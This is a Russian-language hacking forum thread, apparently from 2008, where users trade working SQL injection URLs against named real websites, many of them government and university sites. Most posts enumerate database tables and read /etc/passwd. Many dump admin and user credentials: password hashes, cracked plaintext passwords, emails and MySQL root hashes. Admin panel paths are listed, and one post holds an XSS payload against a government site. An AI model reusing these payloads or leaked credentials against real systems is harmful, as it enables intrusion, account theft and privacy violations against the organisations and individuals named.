http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,table_name,3 ,4,5+from+information_schema.tables/*
теперь смотрим все базы
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,table_schema ,3,4,5+from+information_schema.tables/*
есть хорошие таблички disasterinfo.users, main_data2.admin
так же есть доступ к mysql.user
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,concat_ws(0x 3a,user,password),3,4,5+from+mysql.user/*
есть права на чтение файлов)
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,2,load_file( 0x2f6574632f706173737764),4,5+from+main_data2.admi n/*
переходим к таблицам...
таблица с админами:
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,concat_ws(0x 3a,id,name,pass,email),3,4,5+from+main_data2.admin/*
таблица с юзерами :
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,concat_ws(0x 3a,nickname,password),3,4,5+from+disasterinfo.user s/*
админка тут http://www.disasterinfo.mn/admin/
прекрасная база,для тренировки новичкам)
спасибо за внимание)
Cennarios
06.08.2008, 03:36
http://www.haers.ru/index.php?page=86&id=-1+union+select+1,2,3,4,5,concat(0x3a3a,login_user, 0x3a3a,pass_user),7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30+from+haers.us er+limit+30,190
login ->dom0744
pass ->d6a4f42b2ef93aa0f440ebcfe24a3351 ->fylhtq
Админится через CP, хер расковырял =((, фурычит load_file, насчет outfile х*й понял.
Пускай админа отдерет негр, как последнюю девку!
Activetoy.co.uk - PR 3
хватит постить одно и тоже каждый день! :mad:
http://www.google.ru/search?complete=1&hl=en&newwindow=1&q=site%3Aforum.antichat.ru+Activetoy.co.uk+&btnG=Search
Помогите с http://la2s.a42.ru/index.php?d=library/news&p=comments&newsid=-1'+union+select+1,2,3,table_name+from+information_ schema.tables+limit+1,1/*
Названия таблиц выводятся, но при попытке вывести данные
http://la2s.a42.ru/index.php?d=library/news&p=comments&newsid=-1%27+union+select+1,2,3,concat_ws(0x3a,name,member _login_key)+from+ibf_members+limit+0,1/*
автоматически добавляет site.news к названию таблицы, и пишет что такой то таблицы нету
+from+forum.ibf_members
Обед подан...еда! =)PR6
http://extension.oregonstate.edu/people/employeeSearch/employeeDetail.php?E_num=-786+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+E mployees/*
User:extdbadmin@web3.cws.oregonstate.edu
Dbname:cw_61034_extwebdata
Version:4.1.11-Debian_4sarge7-log
легкий брут не дал резалта..
Соседей: 149 ;)
Знакомтесь
http://lotussoft.com.ua
ребята делают сайты, в портфолио сайты сделанные в 2005 году многие уязвимы, хз может и остальные тоже =)
Nbfet.gov.cn - PR 5
http://www.nbfet.gov.cn/sub/leader-introduce.php?id=-8%20union%20select%201,2,unhex(hex(version()))/*
Wagrowiec.um.gov.pl - PR 4
http://www.wagrowiec.um.gov.pl/info/aktualnosci/tresc.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10/*
4 ветка
http://www.wagrowiec.um.gov.pl/info/aktualnosci/tresc.php?id=-1+union+select+1,login,password,4,5,6,7,8,9,10+fro m+users/*
должны быть юзеры..
Ipirangadonorte.mt.gov.br
http://www.ipirangadonorte.mt.gov.br/home.php?pg=gabinete&id=-1+union+select+1,table_name,3,4,5+from+information _schema.tables+limit+18,1--
5 ветка..
http://www.ipirangadonorte.mt.gov.br/home.php?pg=gabinete&id=-1+union+select+1,login,senha,4,5+from+admuser--
/adm
Cnunirea.licee.edu.ro
http://cnunirea.licee.edu.ro/continut/art.php?slang=ro&id=-15'+union+select+1,version(),id+from+users/*
Students.ee.sun.ac.za
http://students.ee.sun.ac.za/~aresazi/eendragweb/hk.php?id=-1+union+select+1,2,table_schema,4,table_name,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+ information_schema.tables+limit+16,1/*
5 ветка, таблы..
http://students.ee.sun.ac.za/~aresazi/eendragweb/hk.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,username,use r_password),6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23+from+phpbb_users+where+user_level=1/*
сам форум не нашел (
http://students.ee.sun.ac.za/~aresazi/eendragweb/hk.php?id=-1+union+select+1,2,password,4,user,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23+from+aresazi.ae _users/*
юзеры..
News.ogel.dk
http://news.ogel.dk/index.php?id=-38+union+select+1,2,mail,4,5,6,7,8,9,10,11,version (),13,14+from+users
Grainedepastel-uk.com
http://www.grainedepastel-uk.com/categorie.php?id=-1+union+select+all+1,2,3,4,5,table_name+from+infor mation_schema.tables+limit+16,1/*
5 ver. tables..
http://www.grainedepastel-uk.com/categorie.php?id=-1+union+select+all+1,2,3,4,5,concat_ws(0x3a,mail,p assword)+from+grainedegbaseuk.b_clients/*
/dejainscrit.php?prov=index
Сайт: www.fergusonhill.co.uk PR=4
http://www.fergusonhill.co.uk/product_details.php?id=7+union+select+1,2,3,4,5,6, 7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,7 2,73,74,75,76,77,78,79,80,81,82,83,84,85,86/*
Версия БД 4.1.22-standard
Есть таблица users
barracuda
07.08.2008, 01:23
http://www.kalyx.com/store/insertorderalt.cfm?ItemID=1%20or%201=(SELECT+TOP+1 +table_name+FROM+information_schema.tables)--
dont get countinue :confused: :confused: :confused:
http://www.anavasi.gr PR 4
version()=5.0.51a-community
user()=anavasi_ana@localhost
database()=anavasi_ana
http://www.anavasi.gr/en/gpsp.php?id=-24+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ ws(0x3a,version(),user(),database()),14,15,16,17
http://www.aab.org.uk PR 6
blind sql
version=3
http://www.aab.org.uk/contentok.php?id=69+and+3=substring(version(),1,1)&basket=wwsshowconfdets
http://www.copmed.org.uk PR 5
version=4
http://www.copmed.org.uk/page.php?id=25+and+4=substring(version(),1,1)/*
http://www.zenithcafe.co.uk PR 2
version=5
не смог подобрать кол-во полей...
http://www.zenithcafe.co.uk/artists_profile.php?id=2+and+5=substring(version() ,1,1)--
http://wedc.lboro.ac.uk PR 6
version=5
читать файлики нельзя :(
http://wedc.lboro.ac.uk/projects/new_projects3.php?id=60+union+select+1,2,concat_ws (0x3a,version(),user(),database()),4,5,6,7
Люди есть у кого нибуть сайт где можно слово в hex число перевести! А то был оди хороший сайт http://hack-shop.org.ru/tools-code-encode но его жестоко засрали какойто х*йней ! В инете чтото ваще непонятное!!! (ПРИМЕР:Перевести допустим card_user (переводил на хак-туле - бывшем) получалось 0x636172645f75736572 ! ОЧ нужен почти такой же сайт!!!))Ну или чото типа того приписать 0x не сложно)
http://k0x.ru/encoder/index.php
Полдник..=)
http://acad.coloradocollege.edu/dept/EN/cover.php?block=6[SQL]&year='2008'&type=feature
1,2,3,4,5,6,7,8
Dbname:journalism
User:journalism@web1.coloradocollege.edu
Version:5.0.45
=============================================
Эта есть в антибояне, но мож кто-то захочет ковырнуть еще раз.
http://www.mrc.uidaho.edu/mrc/team/printPeople.php?ID=-470[SQL]
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30
version:4.0.20-debug-debug
Dbname:mrc
User:smit7692@pulvinar.mrc.uidaho.edu
mysql.user
user:password
root:630e00ee259d2812
login
password
3b2e08769d8a337d7618ac02e9ea2401:050600
b553c653dc67be2a267d2dca9b1a88db
=============================================
Valgamaa.ee - PR 5
http://turism.valgamaa.ee/index.php?id=2399999%20union+select+1,2,3,table_na me,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42+from+information_schema.tables--&nfo=2
5 ver. tables
http://turism.valgamaa.ee/index.php?id=2399999%20union+select+1,2,3,email,pw ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42+from+kasutajad--&nfo=2
Canallatino.tv - PR 4
http://www.canallatino.tv/x2/index.php?id=2&seccion=3¬icia=1+union+select+1,unhex(hex(version())),3,4 ,5,6,7,8,9,10,11,12,13,14,15,16
Pangkalpinang.go.id - PR 3
http://www.pangkalpinang.go.id/news_detail.php?news_code=-1+union+select+1,2,table_name,4,5,6,7,8+from+infor mation_schema.tables+limit+24,1/*
Elhacker.org - PR 3
http://www.elhacker.org/index.php?Ver=Seccion&Id=5+and+1=0+union+select+1,2,version(),4,5,6/*
Elincom.gr
http://www.elincom.gr/el/page.php?id=-81+union+select+1,version()+from+users/*
~!DoK_tOR!~
07.08.2008, 21:33
www.edu.ru - Российское образование. Федеральный образовательный портал: учреждения, программы, стандарты
http://www.edu.ru/abitur/index.php?act=3&ds=1&isn=-1+union+select+@@version,2,3,4--
Доктор слух у меня вопрос по поводу @@ - зач енто?Если влом обьяснять то скажи ссылку где проэто написано!?
www.sport-moda.ru
Уязвимость в скрипте показа новостей:
http://www.sport-moda.ru/news/view_new.php?id=1'
Колонки:
http://www.sport-moda.ru/news/view_new.php?id=-286+union+select+1,2,3/*
Информация о базе:
u15055
5.0.45-log
u15055@10.10.10.131
BanQui
таким способом узнается версия в mssql
@@version тоже самое что и version() просто для каждой системы свои запросы )
$p01nt
жаль нельзя аватарки заливать (
~!DoK_tOR!~
07.08.2008, 22:52
Доктор слух у меня вопрос по поводу @@ - зач енто?Если влом обьяснять то скажи ссылку где проэто написано!?
потому что это MSSQL в MSSQL так и узнаётся версия )
http://www.sephiroth.it PR 4
4 ветка слепая скуль)
http://www.sephiroth.it/file_detail.php?id=-139+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11
http://www.infn.it если верить гуглу,то PR 8
и опять blind...
version=5
http://www.infn.it/news/newsen.php?id=-390+union+select+1,2,3,4,concat_ws(0x3a,version(), user(),database()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35
http://www.hvar.is PR 6
version = 5 blind sql
http://www.hvar.is/sida.php?id=5+and+5=substring(version(),1,1)
http://www.ethics.utoronto.ca PR 5
version = 3
http://www.ethics.utoronto.ca/index.php?nid=20+and+substring(version(),1,1)=3/*&id=20
всем удачного вечера =) HF & GL
Грузинские Сайты в тему:
http://www.tbilisi.gov.ge/index.php?Post=1%22%3E%20%3Cscript%3Ealert(/suki/)%3C/script%3E&sec_id=337&lang_id=DEU
Aversi.ge
http://www.aversi.ge/main.php?lang=geo&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,version(),17,18,19,20,21,22,23/*
Presa.ge
http://presa.ge/index.php?text=news&i=-1+union+select+1,2,concat_ws(0x3a,table_name),4,5, 6,7,8,9,10,11+from+information_schema.tables+limit +17,1--
5 ver. tables
http://presa.ge/index.php?text=news&i=-1+union+select+1,2,concat_ws(0x3a,user_username,us er_password),4,5,6,7,8,9,10,11+from+users--
Ssa.gov.ge
http://www.ssa.gov.ge/index.php?id=69&mid=-1+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25
Flowers.ge
http://www.flowers.ge/fwpopup.php?fwid=-%2015+union+select+1,2,3,concat(char(60,115,116,97 ,114,116,62),table_name,char(58),column_name,char( 60,47,115,116,97,114,116,62)),5,6,7+from+INFORMATI ON_SCHEMA.COLUMNS+limit+0,1/*
Zona.ge
http://site.zona.ge/movies_form.php?name=-1+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21+from+information_schem a.tables+limit+17,1--
5 ver tables...
DVV-international.ge
http://dvv-international.ge/dvv/index.php?sector=view_content&catid=-1+union+select+1,unhex(hex(table_name)),3,unhex(he x(table_schema))+from+information_schema.tables/*
Group.ge
http://group.ge/show.php?id_series=-1+union+select+1,concat(table_name,char(58),column _name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+ information_schema.columns--
5 ver. tables
http://group.ge/show.php?id_series=-1+union+select+1,concat(name,char(58),pass),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17+from+test.na_users--
admin;1234
Tvali.ge
http://www.tvali.ge/index.php?action=search&s=kenzo%20&limit=99999999+union+select+1,2,table_name,4,5,6,7 ,8,9,10,11+from+information_schema.tables/*
5 ver. tables
http://www.tvali.ge/index.php?action=search&s=kenzo%20&limit=99999999+union+select+1,2,concat_ws(0x3a,use r_name,password),4,5,6,7,8,9,10,11+from+tvali.co_u ser/*
Prschool.ge
http://www.prschool.ge/geo/news.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,tab le_name+from+information_schema.tables--
5 ver, tables..
http://www.prschool.ge/geo/news.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,con cat_ws(0x3a,username,user_password)+from+f_users--
юзеры..
http://www.prschool.ge/geo/news.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,con cat_ws(0x3a,name,passwd)+from+user--
admin.. но куда это все вводить я не искал..... язык не приемлев, а так кому интересно... смотрите.. если что в ПМ.
Superfootball.ge
http://superfootball.ge/pl/showpredictionsformatch.php?matchid=-1+union+select+1,2,3,table_name,5,6,7+from+informa tion_schema.tables+limit+17,1--
5 ver. tabels
http://superfootball.ge/pl/showpredictionsformatch.php?matchid=-1+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6,7+from+pluserdata--
Photo.ge
http://www.photo.ge/profile.php?pform=1'
все.. разкручивайте. ушел спать )
завтрак:
http://www.arc.pdx.edu/dev/chemmap/content/mapsearch.php?getvariablename=7
Dbname:chemmap2
User:chemmap_l@bestla.oit.pdx.edu
Version:5.0.37
users
email:password
sreed@pdx.edu:chemmap
class1:summer2007
class2:summer2007
nehal@pdx.edu:7623e2
amitk@pdx.edu:a9f2b8
savyak@pdx.edu:letmein
mailbrush
08.08.2008, 12:17
http://orlandokids.org/latest_infoDetails.php?id=-21+union+select+1,concat_ws(char(58),version(),use r(),database()),3,4/*
http://www.somachlaw.com/attorneys_bio.php?id=-12+union+select+1,2,3,concat_ws(char(58),version() ,user(),database()),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9, 0,1,2,3,4/*
http://www.uplandsgallery.com/artists_details.php?id=-12+union+select+1,concat_ws(char(58),version(),use r(),database()),3,4/*
http://www.screenroom.co.uk/php/id.asp?id=-1+union+select+1,2,user(),4,database(),version(),7 ,8,9,10,11,12,13--
http://www.alwg.cap.gov/index.php?menu=-90+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5/*
http://www.shoesandblues.com/lovesound/entry.php?id=-99999+union+select+1,2,concat(login,0x3a,password) ,4,5,6,7,8+from+users--
http://www.shoesandblues.com/lovesound/entry.php?id=-99999+union+select+1,2,concat(author,0x3a,password ,0x3a,id),4,5,6,7,8+from+blog--
http://www.pogoda.ua/index.php?id=-1+union+select+1,concat_ws(0x3a,login,password,ema il),3,4,5+from+users/*
http://www.hcch.net/index_en.php?act=conventions.authorities&cid=-1+union+select+convert(concat_ws(0x3a,user,passwor d)+using+latin1),2,3,4+from+mysql.user/*
http://www.aprinkis.lv/?id=400284&topic=1+union+select+1,2/*
VERSION: 4.0.22
USER: root@localhost
DATABASE: aprinkis
http://www.aprinkis.lv/?id=400284&topic=1+union+select+1,user/**/from/**/mysql.user/*
http://www.aprinkis.lv/?id=400284&topic=1+union+select+1,password/**/from/**/mysql.user/*
adserver:3befcaeb54184d83
birojutelpas:58ff6e1324b58e04
root:3f138964071fc658
andorraspeds:5ad72be31c9f299a
arktika:5c9caec300d17c0b
epicnic:62c1e60a26602275
indrikis:14a77f346c38c1da
irvarianti:676b813528fbb22e
kandava:1989d36d632e3f9b
leflatvia:5025123b461f063c
mailtender:01d600067d94830a
pirtslietas:79aa91e2338eebcf
progress_cms:753915067ffa83cc
progressolutions:54f03cad5ccd348b
remifa:6117f28d007f5cbd
riepuserviss:2fcf989a39cc6b42
termorelax:32ccd0865fab861c
tvaix:573cad0e0046f051
vidzemestirgus:47150cec595393d6
root: kandava
http://www.sushipoint.lv/index.php?sel=-4+union+select+user()/*
http://www.sushipoint.lv/index.php?sel=-4+union+select+version()/*
Суши тоже уязвимы
обед:
http://ieee.metu.edu/alaattin/v2/yillik.php?id=16[sql]
Version:4.1.11-Debian_4sarge8
Dbname:alaattindb
User:alaattin@localhost
jos_users
admin:21232f297a57a5a743894a0e4a801fc3:admin
alaattink:795b88e1642854dc64a4f9da8b980293
http://ieee.metu.edu/alaattin/v3/administrator/
видимо не та джумла)) а c v2 запоротая
http://www.r25vsk.edu.lv/index.php?id=viensjauns&j=1+union+select+1,database(),version(),user(),5,6 ,7,8/*
VERSION:5.0.22-Debian_0ubuntu6.06.3-log
USER:am@localhost
DATABASE:25vsk
http://www.r25vsk.edu.lv/
index.php?id=viensjauns&j=1+union+select+1,password,user,4,5,6,7,8/**/from/**/mysql.user/*
root: 5055ba8907770700: kurmis
http://www.edu-soft.ru/?project_id=183'
http://www.edu-soft.ru/?project_id=183'
Хм...странная какая-то БД ibase_query()
Это чтоли InterBase из Делфи/C++,или я что-то путаю?
Art-Ge-Force
08.08.2008, 20:20
http://e-bishkek.kg/banki_rash.php?public_id=-1+UNION+SELECT+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT (CONCAT(0x7873716C696E6A626567696E,User(),0x787371 6C696E6A656E64),0x71),0x71),8,9,10,11,12,13
http://moda.kg/news.php?ify_id=-1+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCA T(0x7873716C696E6A626567696E,User(),0x7873716C696E 6A656E64),0x71),0x71),5,6,7,8,9
http://www.building.lv/rus/new/showcat.php?categ_id=1+union+select+1,2,3,4,5,6,7, 8,9,0/*
VERSION: 5.0.45-log
USER: lcweb@localhost
DATABASE: building_rus
http://www.building.lv/rus/new/showcat.php?categ_id=1+union+select+1,table_name,3 ,3,4,5,6,7,8,9/**/from/**/information_schema.tables/*
http://www.building.lv/rus/new/showcat.php?
categ_id=1+union+select+1,user,3,4,password,6,7,8, 9,0/**/from/**/mysql.user/*
root: 6601246238011F5DDCC92FE7E2DC2480C3B7472E
espats: 2C1DDE601732FDE244C41F5936F2856E084B8930
lcweb: DBD0FAA26B656A261DAEA8B6C9CB64790939B902
alute: 8C14F4154F5AA0043EE9A778628C99FC45E14B4E
heydi: 9A4E81B1B436F73677528AC6A14F1DED666DAEC8
lba: 5D4C1BA3B3B50DDC2DE6A15FE7FA42D1F087036C
dzesika: BF144F6F15E9306F96870A619280D5A6C325216B
bioffice: 94A26D7830AAD43DD250F22A0C5F586BBE831B8E
u_ariella: D1B375976DC8758E63F955D6607E293A1447BA3B
madonna: F3859065922CFF8CB80C807994E6502A9F90737D
gallery2: EFB96EC4C51BF221ADF8079902ADAF0B000BFB0D
liene: 3A58B5CF1CE48C5882BA55D327DC670B202B010D
simanft: 0A16657F20FA7E5EFE5152C3F5DB0D771B0D8F44
http://www.opera.ge/
http://www.opera.ge/eng/viewrepertoire.php?id=-25+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,concat_ws(0x3a,username,password),20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34+FROM+users +LIMIT+4,1/*&option=singleview
Tako:10f8d20efd9cc9fa618b119d169c8591::899512388
starwalker:7694f4a66316e53c8cdd9d9954bd611d::q
karvasla12:2f820f87a9965071cb471f7b26ba2d1d::gulik o
tamuna:62596bf6973a46b5b67a22888d1de628:: patara
pat_guia:45b5a7a07503a59bac2ce5193a564fb4::zarathu stra
...
http://www.opera.ge/eng/viewrepertoire.php?id=-25+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,password,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34+FROM+admin/*&option=singleview
admin:a3db0091856e81579ba5709797ed6058::bess001
http://www.opera.ge/admin/
(Пароль не подходит =\ )
P.S. Не могу понять, боян или нет, но все равно выложил от чистого серца к России и от омерзения к Грузии ))
http://kostanaylife.kz/index.php?pname=iass&type=17\'&view=1+union+select+1,2,3,4,5,6,7/*
http://kostanaylife.kz/index.php?
pname=iass&type=17\'&view=1+union+select+1,2,version(),4,user(),databas e(),7/*
VERSION:4.1.22-log
USER:t314kz_adminkl@localhost
DATABASE:t314kz_dbKLNew
Сайт: www.museum.ge PR=5
http://www.museum.ge/web_page/index.php?id=-40+union+select+1,2,3,4,5,6,7,8,9/*
http://www.bar.lv/index.php?lang_id=5&categ_id=-1+union+select+1,2,3,4,5,6,7/*&op=search&search_type=4&sop=category
VERSION:4.1.15-Debian_1ubuntu5-log
USER:bar@92.240.65.136
DATABASE:c_bar
http://www.bar.lv/index.php?lang_id=5&categ_id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(user
(),0x71),0x71),5,6,7/*&op=search&search_type=4&sop=category
http://www.bar.lv/index.php?lang_id=5&categ_id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(versi
on(),0x71),0x71),5,6,7/*&op=search&search_type=4&sop=category
http://www.bar.lv/index.php?lang_id=5&categ_id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(data
base(),0x71),0x71),5,6,7/*&op=search&search_type=4&sop=category
USERNAME: Sergey
http://www.bar.lv/index.php?lang_id=5&categ_id=-1+union+select+1,2,3,aes_decrypt(aes_encrypt(usern ame,0x71),0x71),5,6,7/**/from/**/users/*&op=search&search_type=4&sop=category
inuitcircumpolar.com
тИц = 30 PR = 5
http://s51.radikal.ru/i131/0808/d4/231217966c19.jpg (http://www.radikal.ru)
http://www.inuitcircumpolar.com/index.php?ID=1+union+select+1,1,3,4,5,6,7,8,9,0,1, concat_ws(0x3a,version(),user(),database()),3,4,5, 6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6--&Lang=En
version:5.0.51-log
user :indelta_cms@75.126.146.102
database:indelta_icc
SQL-injection
http://www.inuitcircumpolar.com/index.php?ID=1+union+select+1,1,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6--&Lang=En
Таблицы:
http://www.inuitcircumpolar.com/index.php?ID=1+union+select+1,1,3,4,5,6,7,8,9,0,1, table_name,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 ,3,4,5,6+from+information_schema.tables--&Lang=En
------------------------------------------------------------------
pixheaven.net
тИц = 20 PR = 5
http://www.pixheaven.net/galerie_us.php?id=-3+union+select+1,2,3,4,5,6,7,8,9/*
Вот скуля,принтабельное поле - 7
http://www.pixheaven.net/galerie_us.php?id=-3+union+select+1,2,3,4,5,6,version(),8,9/*
http://s56.radikal.ru/i151/0808/4c/cd44db41a1a4.jpg (http://www.radikal.ru)
J\Очень интересно выводиться версия,но выводиться ограниченно =( то есть можно вывести только числовые значения
GOVядинка :rolleyes:
http://www.dswd.gov.ph/
тИц = 0 PR = 6
http://s58.radikal.ru/i159/0808/d3/bd481936ec46.jpg (http://www.radikal.ru)
SQL-injection
http://www.dswd.gov.ph/faqdetails.php?id=-47+union+select+1,2,3,4,5,6/*
http://www.dswd.gov.ph/faqdetails.php?id=-47+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6/*
Version:5.0.22
User:web41_u1@localhost
database:web41_db1
Таблицы:
http://www.dswd.gov.ph/faqdetails.php?id=-47+union+select+1,table_name,3,4,5,6+from+informat ion_schema.tables/*
P_admin
--ID
--username
-- password
tbGuestbook
tbInqUser
--inUserId
--vcUsername
--vcPassword
--vcFullname
--vcRegion
--vcDivision
--vcAccess
--vcEmail
tbUser
--inUserId
--vcUsername
--vcPassword
--vcFullname
--vcRegion
--vcDivision
--vcAccess
Всего:40 таблиц
tbUser:
admin:d1a032287eaf12e81dd4728323514331
benz:38739d2aac3487e29f6315b64fcd56d5
ampdaep:ab1768ab5bf8233b648a6bb58977e655
bacsec:3015ca4f270b6938b27c95863174a8db
P_admin:
1:alec:f461c42a224b2af04cb40f662ab1c12a
2:benz:5cb2e61606e1d5e1c65c6c31438138a8
3:abet:yofveweq
отчет об ошибках выключен =\
Все делал ручками :rolleyes: :rolleyes:
********************************************
terrorfreetomorrow.org
тИц = 20 PR = 0
http://s49.radikal.ru/i126/0808/d3/d8874a98ec83.jpg (http://www.radikal.ru)
прикольно,все ошибки в алерте выводятсья)))
http://s43.radikal.ru/i102/0808/a7/3a85baf8e707.jpg (http://www.radikal.ru)
SQL-injection
http://www.terrorfreetomorrow.org/articlenav.php?id=-5+union+select+1,2,3,4,5,6/*
http://www.terrorfreetomorrow.org/articlenav.php?id=-5+union+select+1,2,3,4,concat_ws(0x3a,version(),us er()),6/*
Version: 5.0.45-log
user:terrorf_user@65.99.201.17
Таблицы:
http://www.terrorfreetomorrow.org/articlenav.php?id=-5+union+select+1,2,3,4,table_name,6+from+informati on_schema.tables/*
passwords
--username
--upassword
--emailaddress
--firstname
-- lastname
--securitylevel
[QUOTE]http://www.terrorfreetomorrow.org/articlenav.php?id=-5+union+select+1,2,3,4,concat_ws(0x3a,username,upa ssword,emailaddress,securitylevel),6+from+password s+limit+0,11/*
kballen:7c72a099259a2c1c::1
ahutomo:22261f196a56676d:ahutomo@terrorfreetomorro w.org:1
*****************************************
http://www.jerusalemsummit.org/eng/news.php?news=10+union+select+1,2,3,4,5,6,7,8,9,0/*
version: 4 :eek:
Mai.ru - PR 7
http://www.mai.ru/colleges/fac_9/k902/symp/razdel.php?id_razd=7'+and+1=0+union+select+1,2,con cat_ws(0x203a20,id,login,version()),4,5,6,7+from+u sers+limit+0,1/*
Nsa.gov.cn - PR 7
http://www.nsa.gov.cn/view.php?id=-895+union+select+1,version(),3,table_name,5,6,7,8, 9,10,11,12,13,14,15,16+from+information_schema.tab les+limit+16,1
таблы..
http://www.nsa.gov.cn/view.php?id=-895+union+select+1,version(),3,concat_ws(0x3a,user ,password),5,6,7,8,9,10,11,12,13,14,15,16+from+cpc .admin_deliver
http://www.nsa.gov.cn/view.php?id=-895+union+select+1,version(),3,concat_ws(0x3a,user ,password),5,6,7,8,9,10,11,12,13,14,15,16+from+mys ql.user
Radiobremen.de - PR 7
http://www.radiobremen.de/nordwestradio/kurzundgut/index.php?id=1+union+select+1,unhex(hex(version()) ),3,4,5,6,7,8/*
Studiocromie.org - PR 4
http://www.studiocromie.org/gallery.php?id_art=56&id=-216+union+select+1,2,3,4,5,6,7,8,9,10,11,12,table_ name,14,15,16,17,18,19+from+information_schema.tab les+limit+28,1--
5 ver. tables..
http://www.studiocromie.org/gallery.php?id_art=56&id=-216+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat _ws(0x3a,user,pwd),14,15,16,17,18,19+from+studiocr _db.user--
Prefecturatimis.ro - PR 4
http://www.prefecturatimis.ro/comunicate_articol.php?id=99999999+union+select+1, 2,3,4,version(),6/*
Id-studio.info - PR 3
http://id-studio.info/index.php?option=com_neoreferences&Itemid=27&catid=-1+union/**/select+version()/*
http://www.ezerzeme.lv/index.php?ln=ru&action=show&type=daily&eventid=1'+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13/*
VERSION: 5.0.32-Debian_7etch5-log
USER: web41_u1@localhost
DATABASE: web41_db1
http://www.ezerzeme.lv/index.php?ln=ru&action=show&type=daily&eventid=1'+union+select+1,passwd,3,4,5,6,7,8,9,10, 11,12,13/**/from/**/users/*
http://www.ezerzeme.lv/index.php?ln=ru&action=show&type=daily&eventid=1'+union+select+1,name,3,4,5,6,7,8,9,10,11 ,12,13/**/from/**/users/*
http://www.ezerzeme.lv/index.php?ln=ru&action=show&type=daily&eventid=1'+union+select+1,email,3,4,5,6,7,8,9,10,1 1,12,13/**/from/**/users/*
stpgov.org
http://www.stpgov.org/online_planning.php?cat=-6+union+select+1,2,3,concat_ws(0x3,version(),user( ),database()),5,6,7,8,9,10,11,12/*
4.1.20�stpgov@localhost�STPGOV
http://www.stpgov.org/online_planning.php?cat=-6+union+select+1,2,3,concat_ws(0x3,email,password) ,5,6,7,8,9,10,11,12+from+users/*
jhart@stpgov.org�JB1stpgova
Админка: http://www.stpgov.org/admin/
http://www.trekkingclub.kz/index.php?p=1+union+select+1,2,3,4,5,6,7/*
http://www.trekkingclub.kz/index.php?p=1+union+select+1,database(),3,4,5,6,7/*
VERSION:4.1.22
USER:tclub@localhost
DATABASE:tclub
gtr-gifts.com
http://www.gtr-gifts.com/Shop.php?cat=6&subcat=-29+union+select+concat_ws(0x3,version(),user(),dat abase()),2,3,4/*
5.0.45-community-nt�imanez_gtr@localhost�imanez_gtr
http://www.gtr-gifts.com/Shop.php?cat=6&subcat=-29+union+select+concat(user_name,0x3,user_password ),2,3,4+from+gtr_admin+limit+0,1/*
wayne�carling
Cennarios
09.08.2008, 20:41
http://www.pride.ua/index.php?showtopic=-1+union+select+1,concat(name,0x3a3a,member_login_k ey),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28+from+ibf_members+limit+0, 10/*
Что-то не брутятся хеши. Mb дабл md5? .....
http://www.poni.lv/?l=2&c=116&sc=-1+union+select+1,2/*
http://www.poni.lv/?l=2&c=116&sc=-1+union+select+1,database()/*
VERSION: 4.1.20-log
USER: poni@localhost
DATABASE: poni
http://www.poni.lv/?l=2&c=116&sc=-1+union+select+1,2/**/from/**/data/*
Cennarios
09.08.2008, 20:51
